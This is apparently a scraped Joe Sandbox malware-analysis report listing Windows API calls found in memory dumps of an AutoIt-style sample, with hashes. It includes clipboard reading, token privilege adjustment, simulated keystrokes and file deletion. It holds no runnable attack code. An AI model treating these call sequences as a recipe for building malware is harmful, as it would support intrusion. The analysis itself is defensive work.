                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: TextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 530164218-0
                                                                                                                              • Opcode ID: fc5840862ff5d9c598668478a31fa7d74f95d2d1f16acabc02493420135ded42
                                                                                                                              • Instruction ID: 5a7eff0004b7261875bfda48a31f10a54d8e42c17cc553ab59078675dab2cc89
                                                                                                                              • Opcode Fuzzy Hash: fc5840862ff5d9c598668478a31fa7d74f95d2d1f16acabc02493420135ded42
                                                                                                                              • Instruction Fuzzy Hash: C9D067362105149FC701AB99E848C95B7E9EB5D6103018051F50ADB631D661E9509B91
                                                                                                                              APIs
                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,001E49DA,?,?,00000000), ref: 00174FC4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 0cd9338c87b588fae193cecae8519fa9126bb5095ab6ed7ca34d3f0f772c4d89
                                                                                                                              • Instruction ID: 1b9ef2d3c68f5a656c5f4c54f8db7435dd546708aee05c69dd00e8a9c504d164
                                                                                                                              • Opcode Fuzzy Hash: 0cd9338c87b588fae193cecae8519fa9126bb5095ab6ed7ca34d3f0f772c4d89
                                                                                                                              • Instruction Fuzzy Hash: 67D0C974640208BFEB00CB90DC46FAA7BBDEB04718F200194F600A62D0D2F2BE808B55
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 1e1009395c19b30cea66c926b436eb823f69369150526ab1505adccd8ab0cef4
                                                                                                                              • Instruction ID: f24b31ef50817ca0161c53c299b193a1d3e3411fa828a4fb664ee52ed99e090e
                                                                                                                              • Opcode Fuzzy Hash: 1e1009395c19b30cea66c926b436eb823f69369150526ab1505adccd8ab0cef4
                                                                                                                              • Instruction Fuzzy Hash: F8D012B1500201DFEB30AF69F80475AB7E4BF55300F24882DE9C682550DB76E9C2DF11
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,001E5950), ref: 0017510C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2962429428-0
                                                                                                                              • Opcode ID: 0491ff965ea2454eb7ad63978534d4894d79ec67a8d3bc2a28b6f9a36f468b6a
                                                                                                                              • Instruction ID: 0cd97d666b386f928fe989f5868d67114eb4005a381c29c067b9472cfd74a084
• Opcode Fuzzy Hash: 0491ff965ea2454eb7ad63978534d4894d79ec67a8d3bc2a28b6f9a36f468b6a
• Instruction Fuzzy Hash: 40E0B675504B02CBC3354F1AE804412FBF6FFE13613218A2FD0E9826A0D7B05486DB90
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
• NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 001DF64E
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001DF6AD
• GetWindowLongW.USER32(?,000000F0), ref: 001DF6EA
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001DF711
• SendMessageW.USER32 ref: 001DF737
• _wcsncpy.LIBCMT ref: 001DF7A3
• GetKeyState.USER32(00000011), ref: 001DF7C4
• GetKeyState.USER32(00000009), ref: 001DF7D1
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001DF7E7
• GetKeyState.USER32(00000010), ref: 001DF7F1
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001DF820
• SendMessageW.USER32 ref: 001DF843
• SendMessageW.USER32(?,00001030,?,001DDE69), ref: 001DF940
• SetCapture.USER32(?), ref: 001DF970
• ClientToScreen.USER32(?,?), ref: 001DF9D4
• InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 001DF9FA
• ReleaseCapture.USER32 ref: 001DFA05
• GetCursorPos.USER32(?), ref: 001DFA3A
• ScreenToClient.USER32(?,?), ref: 001DFA47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 001DFAA9
• SendMessageW.USER32 ref: 001DFAD3
• SendMessageW.USER32(?,00001111,00000000,?), ref: 001DFB12
• SendMessageW.USER32 ref: 001DFB3D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001DFB55
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 001DFB60
• GetCursorPos.USER32(?), ref: 001DFB81
• ScreenToClient.USER32(?,?), ref: 001DFB8E
• GetParent.USER32(?), ref: 001DFBAA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 001DFC10
• SendMessageW.USER32 ref: 001DFC40
• ClientToScreen.USER32(?,?), ref: 001DFC96
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001DFCC2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 001DFCEA
• SendMessageW.USER32 ref: 001DFD0D
• ClientToScreen.USER32(?,?), ref: 001DFD57
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001DFD87
• GetWindowLongW.USER32(?,000000F0), ref: 001DFE1C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3461372671-4164748364
• Opcode ID: e6a35355fd9e7663e19ff96cc4181a9e88087f599e02c1789bed48c31f474738
• Instruction ID: 92ce828a1b5618e3f739c4f686a02e3bbadad0bcf76ddf5bcce7121d00030455
• Opcode Fuzzy Hash: e6a35355fd9e7663e19ff96cc4181a9e88087f599e02c1789bed48c31f474738
• Instruction Fuzzy Hash: 3732AA70208201AFDB14DF64D884AAABBE6FF48354F14062EF696877B1D730EE52CB51
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 001DAFDB
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
• Opcode ID: afba4fc953335c49906af9eb85611338a48ab1681a83732c2cf8b4095bdf192e
• Instruction ID: b5281f2bc78242a0f0110bf3ea5afcc31defec9576d2163f788f93808008a3ee
• Opcode Fuzzy Hash: afba4fc953335c49906af9eb85611338a48ab1681a83732c2cf8b4095bdf192e
• Instruction Fuzzy Hash: F312BCB1600204ABEB29CF64DC49FBE7BB9EF45710F50425AF51AEB2D0DB748941CB52
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 0018F796
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E4388
• IsIconic.USER32(000000FF), ref: 001E4391
• ShowWindow.USER32(000000FF,00000009), ref: 001E439E
• SetForegroundWindow.USER32(000000FF), ref: 001E43A8
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001E43BE
• GetCurrentThreadId.KERNEL32 ref: 001E43C5
• GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001E43D1
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001E43E2
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001E43EA
• AttachThreadInput.USER32(00000000,?,00000001), ref: 001E43F2
• SetForegroundWindow.USER32(000000FF), ref: 001E43F5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 001E440A
• keybd_event.USER32(00000012,00000000), ref: 001E4415
• MapVirtualKeyW.USER32(00000012,00000000), ref: 001E441F
• keybd_event.USER32(00000012,00000000), ref: 001E4424
• MapVirtualKeyW.USER32(00000012,00000000), ref: 001E442D
• keybd_event.USER32(00000012,00000000), ref: 001E4432
• MapVirtualKeyW.USER32(00000012,00000000), ref: 001E443C
• keybd_event.USER32(00000012,00000000), ref: 001E4441
• SetForegroundWindow.USER32(000000FF), ref: 001E4444
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 001E446B
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: f279b9890afcc2ce147f77467d9a9e1d754c01b567bcf1a6cb135989e34c1248
• Instruction ID: b62cd52f593d3bb7fda7a1a9755d4031b884d60cf503d28cb9a6601c9f1f8956
• Opcode Fuzzy Hash: f279b9890afcc2ce147f77467d9a9e1d754c01b567bcf1a6cb135989e34c1248
• Instruction Fuzzy Hash: D33150B1A40218BBEB216BB2AC49F7F7E6DEB44B54F114025FA05EA1D0D6B05941EEA0
APIs
  • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
  • Part of subcall function 001B7B9F: __wsplitpath.LIBCMT ref: 001B7BBC
  • Part of subcall function 001B7B9F: __wsplitpath.LIBCMT ref: 001B7BCF
  • Part of subcall function 001B7C0C: GetFileAttributesW.KERNEL32(?,001B6A7B), ref: 001B7C0D
• _wcscat.LIBCMT ref: 001B6B9D
• _wcscat.LIBCMT ref: 001B6BBB
• __wsplitpath.LIBCMT ref: 001B6BE2
• FindFirstFileW.KERNEL32(?,?), ref: 001B6BF8
• _wcscpy.LIBCMT ref: 001B6C57
• _wcscat.LIBCMT ref: 001B6C6A
• _wcscat.LIBCMT ref: 001B6C7D
• lstrcmpiW.KERNEL32(?,?), ref: 001B6CAB
• DeleteFileW.KERNEL32(?), ref: 001B6CBC
• MoveFileW.KERNEL32(?,?), ref: 001B6CDB
• MoveFileW.KERNEL32(?,?), ref: 001B6CEA
• CopyFileW.KERNEL32(?,?,00000000), ref: 001B6CFF
• DeleteFileW.KERNEL32(?), ref: 001B6D10
• FindNextFileW.KERNEL32(00000000,00000010), ref: 001B6D37
• FindClose.KERNEL32(00000000), ref: 001B6D53
• FindClose.KERNEL32(00000000), ref: 001B6D61
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 1867810238-1173974218
• Opcode ID: b4b8ec27277e2b04932acaf9f52de9e70bd55dfc6834a2cb0bf4db1e64e84f9a
• Instruction ID: fdd25babc16fa5256b4da8f15729edb08a768cec9186fdb91267ab7d0eb77da2
• Opcode Fuzzy Hash: b4b8ec27277e2b04932acaf9f52de9e70bd55dfc6834a2cb0bf4db1e64e84f9a
• Instruction Fuzzy Hash: C151307290412CAACF21EBA0DC84EEE777DBF29304F4445DAE549A3041DB349B89CF61
APIs
• OpenClipboard.USER32(0020DBF0), ref: 001C70C3
• IsClipboardFormatAvailable.USER32(0000000D), ref: 001C70D1
• GetClipboardData.USER32(0000000D), ref: 001C70D9
• CloseClipboard.USER32 ref: 001C70E5
• GlobalLock.KERNEL32(00000000), ref: 001C7101
• CloseClipboard.USER32 ref: 001C710B
• GlobalUnlock.KERNEL32(00000000), ref: 001C7120
• IsClipboardFormatAvailable.USER32(00000001), ref: 001C712D
• GetClipboardData.USER32(00000001), ref: 001C7135
• GlobalLock.KERNEL32(00000000), ref: 001C7142
• GlobalUnlock.KERNEL32(00000000), ref: 001C7176
• CloseClipboard.USER32 ref: 001C7283
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3222323430-0
                                                                                                                              • Opcode ID: 4ee8d77560a15d8374f64dc8265478b5df4cea26580c9e69308bc938b129b69c
                                                                                                                              • Instruction ID: c9b2214352a748c2dd7788db84148525d4b06f0e6b23c40cc5b7795a1945a7fe
                                                                                                                              • Opcode Fuzzy Hash: 4ee8d77560a15d8374f64dc8265478b5df4cea26580c9e69308bc938b129b69c
                                                                                                                              • Instruction Fuzzy Hash: 8C51DD31208305ABD305EB64EC8AF7E77A9AFA8B11F05451DF54AD21E1EBB0D944CB62
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001ABF0F
                                                                                                                                • Part of subcall function 001ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001ABF3C
                                                                                                                                • Part of subcall function 001ABEC3: GetLastError.KERNEL32 ref: 001ABF49
                                                                                                                              • _memset.LIBCMT ref: 001ABA34
                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001ABA86
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001ABA97
                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001ABAAE
                                                                                                                              • GetProcessWindowStation.USER32 ref: 001ABAC7
                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 001ABAD1
                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001ABAEB
                                                                                                                                • Part of subcall function 001AB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 001AB8C5
                                                                                                                                • Part of subcall function 001AB8B0: CloseHandle.KERNEL32(?), ref: 001AB8D7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                              • String ID: $default$winsta0
                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                              • Opcode ID: 54686435802d4fa9385fc9857e070b119cf62ec838b7270b40157779d44105a6
                                                                                                                              • Instruction ID: 283c6ca5c045a6cc3a2c906f71f99727a89f6ad9929eaa92d1058501863c90c9
                                                                                                                              • Opcode Fuzzy Hash: 54686435802d4fa9385fc9857e070b119cf62ec838b7270b40157779d44105a6
                                                                                                                              • Instruction Fuzzy Hash: 77818875804288AFDF11EFA4DD85EFEBBB9EF0A314F044119F914A6166DB318E54EB20
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001BFE03
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001BFE57
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001BFE7C
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001BFE93
                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 001BFEBA
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF06
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF3F
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • __swprintf.LIBCMT ref: 001BFF93
                                                                                                                                • Part of subcall function 0019234B: __woutput_l.LIBCMT ref: 001923A4
                                                                                                                              • __swprintf.LIBCMT ref: 001BFFE1
                                                                                                                              • __swprintf.LIBCMT ref: 001C0030
                                                                                                                              • __swprintf.LIBCMT ref: 001C007F
                                                                                                                              • __swprintf.LIBCMT ref: 001C00CE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                              • API String ID: 108614129-2428617273
                                                                                                                              • Opcode ID: 7ee906c16b2985aff18358c12415f38304d8629d5b0257cd679ee0654b1df990
                                                                                                                              • Instruction ID: 7b101b1935e8b1ae909f98def3784c245f237815361ca3de4488c220cd42bc31
                                                                                                                              • Opcode Fuzzy Hash: 7ee906c16b2985aff18358c12415f38304d8629d5b0257cd679ee0654b1df990
                                                                                                                              • Instruction Fuzzy Hash: 0AA10E72418344ABC315EBA4CC96DAFB7EDBFA8700F44491DF585C2151EB34EA49CBA2
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001C2065
                                                                                                                              • _wcscmp.LIBCMT ref: 001C207A
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2091
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 001C20A3
                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 001C20BD
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001C20D5
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C20E0
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 001C20FC
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2123
                                                                                                                              • _wcscmp.LIBCMT ref: 001C213A
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C214C
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00223A68), ref: 001C216A
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C2174
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C2181
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001C2191
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                              • Opcode ID: 04f84cf20fb68270d3d776b9e956883e839b704cb7501952d2fb774fa1efcb00
                                                                                                                              • Instruction ID: d139b5ab2ab7225748cd4660c8155e6bf839b189a39eb979d18dc51c5ffc186e
                                                                                                                              • Opcode Fuzzy Hash: 04f84cf20fb68270d3d776b9e956883e839b704cb7501952d2fb774fa1efcb00
                                                                                                                              • Instruction Fuzzy Hash: 11319131A012197BDF24EBA4EC48FEE77AD9F25360F14406AF911E3190DB74DA94CE60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 001DF14B
                                                                                                                                • Part of subcall function 001DD5EE: ClientToScreen.USER32(?,?), ref: 001DD617
                                                                                                                                • Part of subcall function 001DD5EE: GetWindowRect.USER32(?,?), ref: 001DD68D
                                                                                                                                • Part of subcall function 001DD5EE: PtInRect.USER32(?,?,001DEB2C), ref: 001DD69D
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001DF1B4
                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001DF1BF
                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001DF1E2
                                                                                                                              • _wcscat.LIBCMT ref: 001DF212
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001DF229
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001DF242
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 001DF259
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 001DF27B
                                                                                                                              • DragFinish.SHELL32(?), ref: 001DF282
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 001DF36D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                              • API String ID: 2166380349-3440237614
                                                                                                                              • Opcode ID: 677a7ee6b50b97392eb99c771eb6a124aad92fd0200352cfd39a02f6ab6367d6
                                                                                                                              • Instruction ID: 6180915c920749b3f15217b8311cb6d116b099c45c8a675266b6986650dd47ba
